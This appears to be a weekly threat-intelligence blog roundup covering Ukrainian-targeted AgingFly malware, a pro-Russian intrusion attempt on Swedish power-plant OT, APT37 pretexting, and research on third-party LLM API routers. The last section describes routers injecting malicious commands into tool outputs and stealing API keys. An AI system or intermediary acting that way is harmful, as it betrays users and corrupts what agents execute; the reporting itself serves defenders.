admin Avatar

·

Weekly Threat Landscape: Thursday Roundup #4

This week’s reporting touches a few different areas, but it points in the same direction. Infrastructure and operational systems continue to draw attention, while familiar access methods like social engineering are still proving effective. At the same time, newer risks are starting to show up as organizations rely more on AI and external platforms.

Ukrainian Critical Infrastructure and Defense Personnel Targeted by AgingFly Malware/Espionage Campaign

On 15 April 2026, the Computer Emergency Response Team of Ukraine (CERT-UA) identified an ongoing espionage campaign tracked as UAC-0247, which has targeted municipal authorities, clinical hospitals, and emergency medical services over the past two months. The threat actor uses a multi-stage infection chain beginning with phishing emails, often masquerading as humanitarian aid proposals, to deliver a malicious archive containing a specialized malware suite, most notably the AgingFly remote access trojan (RAT). This toolkit, which includes the SilentLoop downloader and the ChromeElevator credential stealer, enables attackers to execute arbitrary code, capture keystrokes, and exfiltrate sensitive data from browsers and messaging apps like WhatsApp. Moreover, the campaign has expanded its scope to target the Ukrainian Defense Forces by distributing malicious drone software updates via Signal, while also occasionally deploying XMRig for unauthorized cryptocurrency mining on compromised infrastructure.

Implications: Targeting critical infrastructure and humanitarian logistics isn’t new, but it continues to point to a broader shift toward undermining civil resilience and gaining visibility into how emergency and medical responses operate in real time. On the IC side, the use of AI-generated websites and malicious code embedded in otherwise legitimate domains shows how social engineering is evolving, making attribution harder and reducing the effectiveness of traditional detection methods.

For the DIB, the reported abuse of drone software distribution through encrypted messaging platforms should raise concerns around the integrity of rapidly deployed and dual-use technologies, especially in active conflict environments. What stands out across these cases is the focus on accessing operational data, things like drone telemetry or emergency coordination, rather than going after traditional enterprise or military networks. That shift increases the importance of verifying where the software and data are actually coming from, particularly when it’s being shared through less controlled channels.

Pro-Russian Actors Target Swedish Thermal Power Plant Operational Technology

On 15 April 2026, Swedish Minister for Civil Defense Carl-Oskar Bohlin disclosed a previously classified 2025 attempt by pro-Russian hackers to infiltrate a thermal power plant in western Sweden. Attributed to actors with suspected links to Russian intelligence, the incident specifically targeted operational technology (OT) systems responsible for physical infrastructure control. While the intrusion was ultimately neutralized by the facility’s internal security protocols, the disclosure highlights a persistent and evolving threat landscape where groups such as NoName057(16) and CyberArmyofRussia_Reborn are transitioning from superficial distributed denial-of-service (DDoS) attacks to more sophisticated, potentially destructive operations against critical utilities across Northern Europe and the Baltic region.

Implications: What stands out here is the move from noisy, disruptive activity to something much more deliberate. Moving into OT environments changes the risk entirely. For orgs running critical infrastructure, it reinforces the need to keep ICS tightly segmented from corporate networks and limit any pathways that could allow an intrusion to move from IT into physical operations.

There’s also a clear geopolitical backdrop: as Sweden deepens its ties with NATO and continues supporting Ukraine, this kind of activity is likely to persist as part of broader grey-zone pressure. For analysts, the focus should be on where these environments are still exposed, especially as state-affiliated groups continue to rely on techniques that blend into normal operations, like using native tools or deploying destructive malware when access is achieved.

APT37 Exploits Social Media Pretexting and Software Tampering to Target Military Research

On 13 April 2026, South Korean-based Genians reported on a targeted pretexting campaign attributed to North Korean APT37 (ScarCruft), where the actor used social media to build rapport with victims before moving conversations to encrypted messaging platforms. From there, targets were persuaded to install a trojanized software package that deployed additional payloads and used legitimate services for C2, helping the activity blend into normal traffic.

Implications: This activity further reinforces how much initial access still depends on trust. The staged approach, starting on social media platforms and ending with a seemingly legitimate software install, makes traditional controls less effective. Like recruitment fraud, it also highlights a shift in where these compromises begin, outside the enterprise boundary, where visibility is limited and user decisions carry more weight.

LLM Supply Chain Risk Emerges Through API Intermediaries

New research highlights a largely overlooked risk in AI workflows: the role of 3rd party API routers acting as intermediaries between users and LLMs. These routers, often used for cost optimization or multi-model access, have full visibility into requests and responses, including prompts, API keys, and tool execution commands. The study analyzed 428 real-world routers and found that some were actively modifying responses or extracting sensitive data. In several cases, routers injected malicious commands into tool outputs, while others captured credentials or reused leaked API keys to process large volumes of downstream traffic. There seems to be no mechanism ensuring that what the model produces is what the user actually receives, creating a supply chain gap between the model and execution.

Implications: This is one of those risks that doesn’t show up until you start operationalizing AI. The problem here doesn’t appear to be the model, but rather everything else around it. These routers are sitting in the middle, trusted by design, with the ability to read and modify everything passing through. If that layer is compromised, the output your system acts on may no longer reflect the model’s intent. As orgs start integrating LLMs into workflows that execute code, query systems, or automate decisions, this becomes a direct execution risk. It also mirrors what we’ve seen in traditional supply chain compromises. You don’t need to break the endpoint if you can just sit in the middle and subtly change behavior. In this case, that may mean injecting commands or collecting credentials. My takeaway is this: As AI moves from analysis into action, trust in the full pipeline matters just as much as trust in the model itself. Thoughts?

Leave a comment